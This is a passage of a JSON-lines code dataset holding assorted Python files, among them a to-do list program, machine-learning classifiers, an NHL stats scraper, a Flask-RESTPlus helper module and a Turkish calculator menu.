print(yoho)\n","sub_path":"check_availability.py","file_name":"check_availability.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"603358590","text":"def command_operator(order):\r\n if order == options_list[0] or order == options_list[3]:\r\n task = input(\"what task would you like to add to your list?: \")\r\n if task == \"exit_task_list\":\r\n return \"exit_the_task_list\"\r\n task_list.append(task)\r\n if task != \"exit_task_list\":\r\n return \"running\"\r\n elif order == options_list[1] or order == options_list[4]:\r\n print(\"your tasks:\")\r\n tasks_in_list = len(task_list)\r\n x = range(0, tasks_in_list, 1)\r\n b = 0\r\n for n in x:\r\n b += 1\r\n print(\"{}.\".format(b), task_list[n])\r\n Y_or_N = input(\"would you like to change or remove or add completion confirmation to a task from the list? Enter ['Y'] or ['N']: \").strip().upper()\r\n while Y_or_N != \"Y\" or Y_or_N != \"N\":\r\n if Y_or_N == \"Y\" or Y_or_N == \"N\":\r\n break\r\n print(\"please answer ['Y'] or ['N']\")\r\n Y_or_N = input(\"would you like to change or remove or add completion confirmation to a task from the list?: \").strip().upper()\r\n if Y_or_N == \"Y\" or Y_or_N == \"N\":\r\n break\r\n if Y_or_N == \"Y\":\r\n xtra = 0\r\n task_number = 1000**10\r\n while type(task_number) != int or task_number > tasks_in_list or type(task_number) != int and task_number > tasks_in_list:\r\n xtra += 1\r\n\r\n if xtra == 1:\r\n task_number = input(\"select the number of the task (please use numericals e.g. 1, 2, 3, etc): \")\r\n else:\r\n task_number = input(\"please use valid numericals (e.g. 1, 2, 3, etc): \")\r\n if type(task_number) != int:\r\n try:\r\n task_number = int(task_number)\r\n except:\r\n task_number = input(\"please use valid numericals (e.g. 1, 2, 3, etc): \")\r\n else:\r\n task_number = int(task_number)\r\n\r\n task_change = input(\"type what you want to change your task to or if you want to remove or confirm a task, type the command [remove]/[completion]/[change]: \").strip().lower()\r\n edit_commands = [\"remove\", \"completion\", \"change\"]\r\n while task_change not in edit_commands:\r\n task_change = input(\"please type the command [remove]/[completion]/[change]: \").strip().lower()\r\n\r\n task_number -= 1\r\n if task_change.lower().strip() == \"change\":\r\n task_list[task_number] = input(\"please type what you would like to change this task to: \")\r\n elif task_change.lower().strip() == \"completion\":\r\n task_list[task_number] = \"{} - completed\".format(task_list[task_number])\r\n elif task_change.lower().strip() == \"remove\":\r\n task_list.remove(task_list[task_number])\r\n else: \r\n return \"halt\"\r\n \r\n \r\n \r\n\r\n\r\nuser_name = input(\"greetings user, what is your name?: \")\r\nprint(\"hello user {}. It's nice to meet you.\".format(user_name))\r\n\r\nglobal task_list\r\nglobal options_list\r\noptions_list = [\"addtask\", \"viewtasks\", \"exitprogram\",\"1\",\"2\",\"3\"]\r\ntask_list = []\r\n\r\nprint(\"what would you like to do out of the following options {}?\".format(user_name))\r\nprint(\"1. add a task to your to do list \\n2. view current tasks in list \\n3. exit the program\")\r\norder = input(\"to select one of the following, please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\nloop = 0\r\norder = str(order).strip().lower().replace(\" \",\"\")\r\nwhile order not in options_list[2] or order not in options_list[5]:\r\n if order in options_list[2] or order in options_list[5]:\r\n break\r\n if loop > 0:\r\n order = input(\"please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\n order = str(order).strip().lower().replace(\" \",\"\")\r\n loop += 1\r\n while order not in options_list:\r\n print(\"command {} unrecognised\".format(order))\r\n order = input(\"to select one of the following, please enter the number of your objective or the following comands: ['add task', 'view tasks', 'exit program']: \")\r\n order = str(order).strip().lower().replace(\" \",\"\")\r\n if order in options_list[2] or order in options_list[5]:\r\n break\r\n if order in options_list[0] or order in options_list[3]:\r\n print(\"type command ['exit_task_list'] if you want to stop adding tasks.\")\r\n if order in options_list[1] or order in options_list[4]:\r\n program_status = command_operator(order)\r\n else:\r\n command_operator(order)\r\n program_status = \"running\"\r\n while program_status != \"exit_the_task_list\" and program_status == \"running\":\r\n program_status = command_operator(order)\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\nprint(\"bye-bye.\")\r\n\r\n\r\n \r\n ","sub_path":"Yr12 - to do list task (final, finished version), python revision.py","file_name":"Yr12 - to do list task (final, finished version), python revision.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"491211006","text":"#! /usr/bin/python\r\nimport math\r\n\r\ntesting_data_file = input(\"Please input the relative path to the testing data file: \")\r\nparameter_file = input(\"Please input the relative path to the parameter data file: \")\r\noutput_file = input(\"Please input the relative path to the file that will contain the output data: \")\r\n\r\n# Parse the testing data:\r\nclasses = []\r\nX = []\r\nwith open(testing_data_file, 'r') as f:\r\n K = int(f.readline())\r\n D = int(f.readline())\r\n current = f.readline()\r\n while current != '':\r\n classes.append(int(current))\r\n current_input = []\r\n for i in range(1, 17):\r\n current_input.extend(map(int, f.readline().split()))\r\n X.append(current_input)\r\n current = f.readline()\r\n\r\navailable_classes = range(1, K + 1)\r\navailable_dimensions = range(D)\r\nN = len(classes)\r\n\r\n# Parse the parameters:\r\npriors = {}\r\nmeans = {}\r\nvariances = []\r\nwith open(parameter_file, 'r') as f:\r\n f.readline() # 'd'\r\n f.readline() # K\r\n f.readline() # D\r\n for k in available_classes:\r\n f.readline()\r\n priors[k] = float(f.readline())\r\n means[k] = list(map(float, f.readline().split()))\r\n variances = list(map(float, f.readline().split()))\r\n\r\n\r\ndef conditional_probability(observation, k):\r\n exponent = sum([math.pow(observation[d] - means[k][d], 2) / variances[d] for d in available_dimensions])\r\n return priors[k] * math.exp(-.5 * exponent)\r\n\r\n# Calculate error rate and confusion matrix:\r\nerrors = 0\r\nconfusion = [[0] * K for k in available_classes]\r\nfor (x, k_x) in zip(X, classes):\r\n conditional_probabilities_by_class = {k: conditional_probability(x, k) for k in available_classes}\r\n max_k = max(conditional_probabilities_by_class, key=conditional_probabilities_by_class.get)\r\n\r\n confusion[k_x - 1][max_k - 1] += 1\r\n if max_k != k_x:\r\n errors += 1\r\n\r\n# Write error rate and confusion matrix into output file:\r\nwith open(output_file, 'w') as output:\r\n def write_line(text):\r\n output.write(str(text) + \"\\n\")\r\n\r\n write_line(str(errors / len(X)))\r\n for row in confusion:\r\n write_line(\"\\t\".join(map(str,row)))\r\n","sub_path":"Exercise3/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"380183853","text":"# data path and files in that folder\r\ndataset_Path=\"C:/NLP_homeworks/hw_3/dataset/\"\r\nfiles=[\"dataset.sentences\", \"dataset.labels\", \"int-keywords.txt\", \"featuresAdvancedCase.txt\" ]\r\n\r\nsentences = [line.split() for line in open(dataset_Path+files[3])]\r\nclassLabels=[line.rstrip() for line in open(dataset_Path+files[1])]\r\nintRelatedWords=[line.rstrip() for line in open(dataset_Path+files[2])]\r\n\r\n# all data in the variable SENTENCES now\r\n\r\ndef create2D_Table_with_zeros(m,n):\r\n import random\r\n set=[0,0]\r\n # Create a list.\r\n table1 = []\r\n for i in range(m):\r\n table1.append([])\r\n for j in range(n):\r\n table1[i].append(0) #random.choice(set))\r\n #for i in range(n):\r\n # print(table1[i],end=\"\\n\")\r\n return table1\r\n# for baseline\r\ntraining_x_baseline=create2D_Table_with_zeros(3000,len(sentences[0])-3)\r\ntraining_y_baseline=create2D_Table_with_zeros(3000,1)\r\n\r\ntest_x_baseline=create2D_Table_with_zeros(len(sentences)-3000,len(sentences[0])-3)\r\ntest_y_baseline=create2D_Table_with_zeros(len(sentences)-3000,1)\r\n\r\nfor i in range(3000):\r\n \r\n for j in range(len(sentences[i])-3):\r\n pass\r\n training_x_baseline[i][j]=sentences[i][j]\r\n\r\n training_y_baseline[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\nfor i in range(len(sentences)-3000):\r\n for j in range(len(sentences[i])-3):\r\n test_x_baseline[i][j]=sentences[i][j]\r\n\r\n test_y_baseline[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\n# for advanced line\r\ntraining_x_advanced=create2D_Table_with_zeros(3000,len(sentences[0])-1)\r\ntraining_y_advanced=create2D_Table_with_zeros(3000,1)\r\n\r\ntest_x_advanced=create2D_Table_with_zeros(len(sentences)-3000,len(sentences[0])-1)\r\ntest_y_advanced=create2D_Table_with_zeros(len(sentences)-3000,1)\r\n \r\nfor i in range(3000):\r\n \r\n for j in range(len(sentences[i])-1):\r\n pass\r\n training_x_advanced[i][j]=sentences[i][j]\r\n\r\n training_y_advanced[i][0]=sentences[i][-1]\r\n\r\n\r\n\r\nfor i in range(len(sentences)-3000):\r\n for j in range(len(sentences[i])-3):\r\n test_x_advanced[i][j]=sentences[i][j]\r\n\r\n test_y_advanced[i][0]=sentences[i][-1]\r\n\r\nfrom sklearn import svm\r\n\r\n\r\nimport scipy\r\nfrom sklearn import svm\r\n","sub_path":"readFeatureData.py","file_name":"readFeatureData.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"303956958","text":"from sklearn.decomposition import PCA\nfrom sklearn import svm\n\nimport numpy as np\nimport pandas as pd\n\n# The competition datafiles are in the directory ../input\n# Read competition data files:\ndata = pd.read_csv(\"../input/train.csv\")\ntarget = data[[0]].values.ravel()\ntrain = data.iloc[:, 1:].values\ntest = pd.read_csv(\"../input/test.csv\").values\n\npca_model = PCA(n_components=10, copy=False, whiten=True)\ntrain = pca_model.fit_transform(train)\ntest = pca_model.transform(test)\n\nsvm_model = svm.SVC()\nsvm_model.fit(train, target)\n\nprediction = svm_model.predict(test)\nnp.savetxt('submission_pca_svm.csv', np.c_[range(1, len(test) + 1), prediction], delimiter=',', comments = '', header = 'ImageId,Label', fmt='%d')","sub_path":"digit/digit_pca_svm.py","file_name":"digit_pca_svm.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"177666811","text":"import numpy as np\r\nimport math\r\nimport scipy\r\nfrom scipy.optimize import fsolve\r\nfrom scipy import special\r\n\r\n#matplotlib inline\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import interpolate\r\n\r\nF = 36\r\nZ = 10\r\nCWmin = 8\r\nBI = 10\r\nL = 1\r\nmu = 3 #среднее время получения пакета\r\nS=7\r\nM = 7\r\nTb = (BI - Z*L)/Z\r\n\r\nalpha= 1-math.exp((-1/mu)*(Tb))\r\n\r\nbeta=1-math.exp((-1/mu)*(Tb+L))\r\n\r\nN = 1\r\n\r\nF = 36\r\n\r\nWmin = 8\r\nWmax = 1024\r\nM = 7\r\n# 8 16 32 64 128 256 512 1024\r\n\r\ndef W(i):\r\n return 2**i*Wmin\r\n\r\ndef delta(a,b):\r\n if a==b:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef Vfunc(i):\r\n return int(math.ceil( ((math.pow(2,i)) * Wmin -1 )/F))\r\n\r\ndef supereqEZ(p):\r\n if N==0 or N==1 or F==0:\r\n return p\r\n else:\r\n return F*( 1 - math.pow(1.-p,1./(N-1)))*(1-p) - 1/((1-alpha)/beta + (1/(1-p) + math.fsum([ (1-delta(Vfunc(i),0))*(1 - (2 + Vfunc(i)*F)/((2**(i+1))*Wmin) )*(Vfunc(i)-1)*(p**i) for i in range(S)])\\\r\n+ (1-delta(Vfunc(S),0))*( 1 - (2 + Vfunc(S)*F)/((2**(S+1))*Wmin) )*(Vfunc(S)-1)*(p**S)/(1-p)))\r\n\r\ndef findtau(p):\r\n if N==0:\r\n return 0\r\n if N==1:\r\n return math.pow((1+(1-alpha)/beta),-1)\r\n else:\r\n return F*( 1 - math.pow(1.-p,1./(N-1)))\r\n\r\n\r\ndef H(i,k):\r\n if ((k==(Vfunc(i)-1)) and (Vfunc(i)==1)):\r\n return int((W(i)-2)%F + 2)\r\n if ((k==(Vfunc(i)-1)) and (Vfunc(i)!=1)):\r\n return int((W(i)-2)%F + 1)\r\n if (k==0):\r\n return F+1\r\n if ((0 and\n.\n\n\nExample usage, reading playerstats:\n\nq = Query()\nq.season(\"20142015\")\nq.gametype(\"regular\")\nq.report(\"summary\")\n\nfor row in q:\n print (row)\n\n\nExample usage, getting career stats tables for a specific Player:\n\np = Player(8474577)\nprint (p.tables)\n\n\"\"\"\n\nfrom urllib.parse import urlencode, parse_qs\nfrom urllib.request import urlparse\nfrom urllib.request import urlopen\nfrom lxml import etree\nimport re\n\n\nPAGES = {}\n\n\nclass NHlException(Exception):\n pass\n\n\ndef getdoc(url):\n \"\"\"Returns the HTML DOM as an etree Elementree\"\"\"\n if url not in PAGES:\n try:\n response = urlopen(url)\n content = response.read().decode('utf-8')\n parser = etree.HTMLParser()\n except Exception as e:\n raise SystemExit(e)\n\n PAGES[url] = etree.fromstring(content, parser)\n\n return PAGES[url]\n\n\ndef stringify(element):\n \"\"\"Concatenates all text in the subelements into one string\"\"\"\n return u\"\".join([x for x in element.itertext()]).strip().replace(\"\\n\",\n \" \")\n\ndef get_nhlid_from_tablerow(tr):\n \"\"\"Get player ID from href inside the row\"\"\"\n anchor_tag = tr.find(\".//a[@href]\")\n\n if anchor_tag is not None:\n href = anchor_tag.attrib['href']\n if re.match(r\"^/ice/player.htm\", href):\n qs = urlparse(href).query\n return parse_qs(qs).get(\"id\", None)[0]\n\n\ndef get_table_columns(table):\n \"\"\"Returns the column names for the table.\n We skips first col, as it's only the row number.\n We add NHL ID and Number columns in the beginnnig.\n \"\"\"\n thead = table.find(\"thead\")\n columns = [stringify(th) for th in thead.findall(\".//th\")]\n return ['nhl_id', 'number'] + columns[1:]\n\n\ndef get_table_pages_urls(url):\n \"\"\"Gets URLS for pages of the table at the given URL\"\"\"\n\n doc = getdoc(url)\n\n urls = []\n pages_div = doc.find(\".//div[@class='pages']\")\n\n #Check for empty table\n if pages_div is None:\n return urls\n\n #Check for one page table\n page_anchors = pages_div.findall(\"a\")\n if len(page_anchors) < 1:\n urls.append(url) # One page table\n return urls\n\n #Get the last page anchor\n last_anchor = page_anchors[-1]\n last_anchor_href = last_anchor.get(\"href\")\n\n #Get the number of the last page\n pattern = re.compile(r\"(\\d+)\")\n number_of_pages = pattern.findall(last_anchor_href)[-1]\n\n #Load all pages\n nhl_base_url = \"http://www.nhl.com\"\n for p in range(1, int(number_of_pages) + 1):\n page_url = last_anchor_href.replace(\"pg=\" + number_of_pages,\n \"pg=\" + str(p))\n urls.append(nhl_base_url + page_url)\n\n return urls\n\n\ndef readrows(urls, limit=None):\n \"\"\"Reads all or a limited numbers of rows from the table\"\"\"\n\n row_counter = 0\n for url in urls:\n\n doc = getdoc(url)\n\n table = doc.find(\".//table[@class='data stats data-table table-origin']\")\n\n if row_counter == 0:\n yield get_table_columns(table)\n\n tbody = table.find(\"tbody\")\n\n if tbody is None:\n raise StopIteration\n\n for tr in tbody.findall('tr'):\n\n if limit is not None and row_counter == limit:\n raise StopIteration\n\n nhl_id = get_nhlid_from_tablerow(tr)\n\n data = [nhl_id] + [stringify(td) for td in tr.findall(\"td\")]\n\n yield data\n\n row_counter += 1\n\n\nclass Query:\n \"\"\"Query for playerstats\"\"\"\n\n PLAYERSTATS_URL = \"http://www.nhl.com/ice/playerstats.htm\"\n\n def __str__(self):\n return self.url()\n\n def season(self, s):\n if re.match(r\"\\d{8}\", s):\n self.season = s\n return self\n\n def gametype(self, gt):\n if gt == 'regular':\n self.gameType = 2\n elif gt == 'playoffs':\n self.gameType = 3\n return self\n\n def team(self, t):\n if re.match(r\"[A-Z]{3}\", t):\n self.team = t\n return self\n\n def country(self, c):\n if re.match(r\"[A-Z]{3}\", c):\n self.country = c\n return self\n\n def position(self, p):\n if p in (\"S\", \"C\", \"D\", \"F\", \"G\", \"L\", \"R\"):\n self.position = p\n return self\n\n def report(self, r):\n if r in ('bios', 'summary'):\n self.viewName = r\n return self\n\n def url(self):\n \"\"\"Builds the URL based on parameters\"\"\"\n if self.position == 'G' and self.viewName == 'bios':\n self.viewName = 'goalieBios'\n\n query = self.__dict__\n\n url = Query.PLAYERSTATS_URL + \"?\" + urlencode(query)\n\n return url\n\n def run(self, limit=None):\n urls = get_table_pages_urls(self.url())\n print (urls)\n return readrows(urls, limit)\n\n def fetch(self, limit=None):\n result = []\n for p in self.run(limit):\n result.append(p)\n return result\n\n def __iter__(self):\n return self.run()\n\n\nclass Player:\n \"\"\"Represent an NHL player on nhl.com\"\"\"\n\n CAREER_URL = \"http://www.nhl.com/ice/player.htm?id={}\"\n\n def __init__(self, player_id):\n \"\"\"Loads the player stats page as an ElementTree\"\"\"\n url = Player.CAREER_URL.format(player_id)\n self.doc = getdoc(url)\n\n @property\n def twitter(self):\n \"\"\"Gets the players twitter handle or None\"\"\"\n twitter_tag = self.doc.find(\".//a[@class='twitter-follow-button']\")\n if twitter_tag is not None:\n return twitter_tag.get(\"href\").split(\"/\")[-1]\n\n @property\n def tables(self):\n \"\"\"Grabs all career tables from the player page.\"\"\"\n\n playerstats_tables = []\n\n for table in self.doc.findall(\".//table[@class='data playerStats']\"):\n\n headers = [th.text for th in table.findall(\".//th\")]\n\n table_group = [headers]\n\n for row_i in table.findall(\".//tr\")[1:]:\n\n data = [stringify(td) for td in row_i.findall(\"td\")]\n\n table_group.append(data)\n\n playerstats_tables.append(table_group)\n\n return playerstats_tables\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Read playerstats from nhl.com')\n parser.add_argument('seasons', metavar='Seasons', help='e.g. 20142015')\n parser.add_argument('-p', '--pos', dest='position',\n action='store',\n default=\"S\",\n choices=('S', 'G', 'D', 'L', 'R', 'C'),\n help='Player position')\n parser.add_argument('-g', '--gametype', dest='gametype',\n action='store',\n default=\"regular\",\n choices=('regular', 'playoffs'),\n help='Gametype')\n parser.add_argument('-r', '--report', dest='report',\n action='store',\n default=\"summary\",\n choices=('bios', 'summary'),\n help='Report')\n args = parser.parse_args()\n\n q = Query()\n q.season(args.seasons)\n q.gametype(args.gametype)\n q.position(args.position)\n q.report(args.report)\n\n writer = csv.writer(sys.stdout)\n writer.writerows(q)\n\n\nif __name__ == '__main__':\n import argparse\n import csv\n import sys\n main()\n","sub_path":"nhl.py","file_name":"nhl.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470799880","text":"def test():\n # 条件判断\n age = 11\n if age >= 18:\n print('you age is', age)\n print('adult')\n elif age >= 6:\n print('teenage')\n else:\n print('you age is', age)\n print('kid')\n # Python 语法与缩进的距离有关系 ,条件语句一定要缩放,不然会有语法错误\n print('if else外面')\n\n # 语法格式\n # if <条件判断1>:\n # <执行1>\n # elif <条件判断2>:\n # <执行2>\n # elif <条件判断3>:\n # <执行3>\n # else:\n # <执行4>\n\n # 输入条件\n birth = int(input('input the birth of year: '))\n if birth < 2000:\n print('00前')\n else:\n print('00后')\n\n\ndef BMI():\n hight = float(input('请输入身高 例如:1.75 '))\n weight = float(input('请输入体重 例如:80.5 '))\n bmi = weight / (hight * hight)\n if bmi < 18.5:\n print('过轻')\n elif bmi >= 18.5 and bmi < 25:\n print('正常')\n elif bmi >= 25 and bmi < 28:\n print('过重')\n elif bmi >= 28 and bmi < 32:\n print('肥胖')\n elif bmi >= 32:\n print('严重肥胖')\n print('bmi=', bmi)\n\n\ndef main():\n test()\n BMI()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_exercise/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524110975","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import neighbors\nfrom sklearn.ensemble import RandomForestClassifier\nimport time\nfrom sklearn import preprocessing\n\n\ndef load_data(path):\n '''\n :param path: 输入文件所在文件夹地址\n :return: x属性,y标签,test属性\n '''\n\n df = pd.read_csv(path + 'train.csv', sep=',')\n data = df.values\n x_train = preprocessing.binarize(data[:, 1:]) # 第0列就是标签,2分化一下会不会好一点\n y_train = data[:, 0]\n\n test_file = pd.read_csv(path + 'test.csv', sep=',')\n test_data = preprocessing.binarize(test_file.values)\n x_test = test_data\n\n return x_train, y_train, x_test\n\n\ndef predict(path):\n x_train, y_train, x_test = load_data(path)\n\n logClf = RandomForestClassifier()\n logClf.fit(x_train, y_train)\n\n preResult = logClf.predict(x_test)\n\n writeFile = open(path + 'submit1.csv', 'w')\n writeFile.write('ImageId,Label\\n') # 第一行标题\n\n n = len(preResult)\n for i in range(n):\n writeFile.write('%d,%d\\n' % (i + 1, preResult[i]))\n writeFile.close()\n\n\ndef test(path):\n start_time = time.time()\n predict(path)\n end_time = time.time()\n print('done in ' + str(end_time - start_time) + ' seconds.')\n print('done in ' + str((end_time - start_time) / 60) + ' minutes.')\n\n\npath='/Users/zhouang/Downloads/kaggle/识别数字/'\ntest(path)\n","sub_path":"Digit_Recognizer.py","file_name":"Digit_Recognizer.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"106095003","text":"# Test Interface\n\nfrom Tkinter import *\nimport RPSgame_Interface\nimport os\n\nroot = Tk()\nroot.title(\"Game Collection\")\n\nmainframe = Frame(root, height=200, width=500)\nmainframe.pack_propagate(0)\nmainframe.pack(padx=5, pady=5)\n\nintro = Label(mainframe, text=\"Choose a game to play\")\nintro.pack(side=TOP)\n\nrps_game = Button(mainframe, text=\"Rock, Paper, Scissors\", command=RPSgame_Interface.gui)\nrps_game.pack()\n\nexit_button = Button(mainframe, text=\"Quit\", command=root.destroy)\nexit_button.pack(side=BOTTOM)\n\nos.system('''/usr/bin/osascript -e 'tell app \"Finder\" to set frontmost of process \"Python\" to true' ''')\nroot.mainloop()\n","sub_path":"testInterface.py","file_name":"testInterface.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"52747441","text":"from sklearn.linear_model import Lasso,LogisticRegression,Ridge\nimport pandas as pd\nimport numpy as np\ndef lasso(file):\n dataset = pd.read_csv(file,engine='python').dropna(axis=1)\n features_name = dataset.columns.values.tolist()\n dataset = np.array(dataset)\n\n X = dataset[:, 1:]\n y = dataset[:, 0]\n\n lasso = Lasso()\n lasso.fit(X, y)\n result = [(x, y) for x, y in zip(features_name[1:], lasso.coef_)]\n result1 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n ridge = Ridge()\n ridge.fit(X, y)\n result = [(x, y) for x, y in zip(features_name[1:], ridge.coef_)]\n result2 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n logistic = LogisticRegression()\n logistic.fit(X, y)\n\n result = [(x, y) for x, y in zip(features_name[1:], logistic.coef_[0])]\n result3 = sorted(result, key=lambda x: abs(x[1]), reverse=True)\n\n\n\n\n return ([x[0] for x in result1 if abs(x[1])>0.0000000000001],\n [x[0] for x in result2 if abs(x[1])>0.0000000000001],\n [x[0] for x in result3 if abs(x[1])>0.0000000000001])\n\ndef run(csvfile,logger):\n logger.info('linear model start...')\n feature_list = lasso(csvfile)\n\n logger.info('linear model end.')\n return feature_list\n#\n# filepath = r'J:\\多设备共享\\work\\MRMD2.0-github\\mixfeature_frequency_DBD.csv'\n# result = lasso(filepath)","sub_path":"feature_selection/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"506885546","text":"from billion_prices_india.spiders.BasePepperFry import BasePepperFry\n\n__author__ = 'sats'\n\n\nclass PepperFry(BasePepperFry):\n \"\"\"Scrape pet supplies tab from pepper fry\"\"\"\n name = \"pf_bedbath\"\n start_urls = ['http://www.pepperfry.com/bed-bath-%s.html' % s for s in\n ['bed-sheets', 'combo-offers', 'bed-covers', 'duvet-covers', 'blankets-quilts', 'bedding-diwan-sets',\n 'pillow-covers', 'pillow-inserts', 'mattresses', 'diwan-sets', 'mirrors', 'yoga-mats', 'bath-mats',\n 'bathroom-scales', 'bath-robes-gowns', 'towels', 'bathroom-cabinets', 'bathroom-shelves',\n 'towel-holders', 'toilet-paper-holders', 'bathroom-tumblers', 'clothes-hooks', 'personal-grooming',\n 'soap-dishes',\n 'soap-dispensers', 'cotton-swab-holders', 'bath-sets', 'sanitary-ware-showers',\n 'sanitary-ware-faucets', 'sanitary-ware-stop-cocks-and-angles', 'sanitary-ware-mixers',\n 'sanitary-ware-floor-drains', 'sanitary-ware-cisterns', 'sanitary-ware-pipes-hoses', 'kids']]\n\n\n","sub_path":"billion_prices_india/billion_prices_india/spiders/pf_bedbath.py","file_name":"pf_bedbath.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"213570904","text":"import traceback\n\nfrom flask_restplus import Api\nfrom sqlalchemy.orm.exc import NoResultFound\n# from log import log\nfrom log import log\n\napi = Api(version='1', title='flask_api_example',\n description='flask_api_example')\n\nfun_dict = {\n 'resp_204': api.response(\n 204,\n 'successfully updated.'),\n 'resp_401': api.response(\n 401,\n 'token auth fail.'),\n 'resp_403': api.response(\n 403,\n 'access forbidden.'),\n 'resp_404': api.response(\n 404,\n 'no result found or update object not exist'),\n 'expect': api.expect,\n 'marshal1': api.marshal_with,\n 'marshal2': api.marshal_list_with}\n\n\n@api.errorhandler\ndef default_error_handler(e):\n message = 'An unhandled exception occurred.'\n log.exception(message)\n if not globals()['FLASK_DEBUG']:\n return {'message': message}, 500\n\n\n@api.errorhandler(NoResultFound)\ndef database_not_found_error_handler(e):\n log.warning(traceback.format_exc())\n return {'message': 'A database result was required but none was found.'}, 404\n\n\ndef decorator_compose(*funs):\n def decorator(f):\n for fun in reversed(funs):\n f = fun(f)\n return f\n return decorator\n","sub_path":"api/restplus.py","file_name":"restplus.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542434747","text":"# coding=utf-8\nimport time\nota_hotel_room_type_table = {\n #新增房型前台id,以防止以后出现两个id\n \"room_type_front_id\":\"\",\n \"room_type_id\":\"\",\n \"room_type_name\":\"\",\n \"channel_id\":-1,\n \"ota_bkstg_name\":\"\",\n \"platform_id\":-1,\n \"channel_sub_id\":-1,\n \"hotel_id\":\"\",\n \"room_count\":-1,\n \"desc\":\"\",\n \"area\":\"\",\n \"floor\":\"\",\n \"bed_type\":\"\",\n \"bed_size\":\"\",\n \"bed_count\":-1,\n \"retail_price\":0.0,\n \"max_occupancy\":-1,\n \"has_internet\":-1,\n \"internet_type\":-1,\n \"internet_service\":\"\",\n \"has_window\":-1,\n \"has_own_toilet\":-1,\n \"has_public_toliet\":-1,\n \"has_toiletries\":-1,\n \"has_slippers\":-1,\n \"has_hot_water\":-1,\n \"has_air_conditioning\":-1,\n \"has_fridge\":-1,\n \"has_computer\":-1,\n \"has_tv\":-1,\n \"has_balcony\":-1,\n \"has_kitchen\":-1,\n \"has_bar\":-1,\n \"has_free_ddd\":-1,\n \"has_free_idd\":-1,\n \"can_add_bed\":-1,\n \"add_bed_fee\":\"\",\n \"additional_services\":\"\",\n \"is_hours_room\":-1,\n \"status\":\"\",\n \"reserved_col1\":\"\",\n \"reserved_col2\":\"\",\n \"reserved_col3\":\"\",\n \"reserved_col4\":\"\",\n \"reserved_col5\":\"\",\n \"crawl_version\":\"\",\n \"crawl_time\":time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"sub_rooms\":[]\n }","sub_path":"ycfspider/ycf/ycfspider-for-schedule/ycfspider/tables/ota_hotel_room_type_table.py","file_name":"ota_hotel_room_type_table.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"452451318","text":"import math\nimport sys\n\ndef secim(k):\n\tprint(\"\"\"MATHMATMHMATMAHMATMAHMAHMATMAHM\nToplama için 1\nÇıkarma için 2\nÇarpma için 3\nBölmek için 4\nFaktoriyel için 5\nBüyüye yuvarlamak için 6\nKüçüğe yuvarlamak için 7\n-----------------\nÇıkmak için Q\nProgram esnasında bu menüye ulaşmak için \\\"geri\\\" yazınız.\nMATMAHMATMAHMATMHMATHMATMHMAHMMA\n\"\"\")\n\n\tk = input()\n\n\tif k == \"1\": \t\n\t\twhile True:\n\t\t\t(toplama(1,2))\n\telif k == \"2\":\n\t\twhile True:\n\t\t\t(cikar(1,2))\n\telif k == \"3\":\n\t\twhile True:\n\t\t\t(çarpma(1,2))\n\telif k == \"4\":\n\t\twhile True:\n\t\t\t(bol(4,3))\n\n\telif k == \"5\":\n\t\twhile True:\n\t\t\t(faktoriyel(4))\n\n\telif k == \"6\":\n\t\twhile True:\n\t\t\t(buyuk_yuvarla(1))\n\n\telif k == \"7\":\n\t\twhile True:\n\t\t\t(kucuk_yuvarla(1))\n\n\telif k == \"q\" or k == \"Q\":\n\t\tsys.exit(\"Çıkılıyor\")\n\n#----------------------------------------------\n\n\ndef toplama(a,b):\n\t# iki sayıyı toplar\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = input(\"İkinci Sayı:\")\n\t\ta = int(a)\n\t\tb = int(b)\n\t\tprint(\"{} + {} = {}\".format(a,b,a+b))\n\n#----------------------------------------------\n\ndef çarpma(a,b):\n\t# iki sayıyı çarpar\n\ta = input(\"İlk sayı:\")\n\tif a == \"geri\":\n\t\tsecim(1)\n\telse:\n\t\tb = 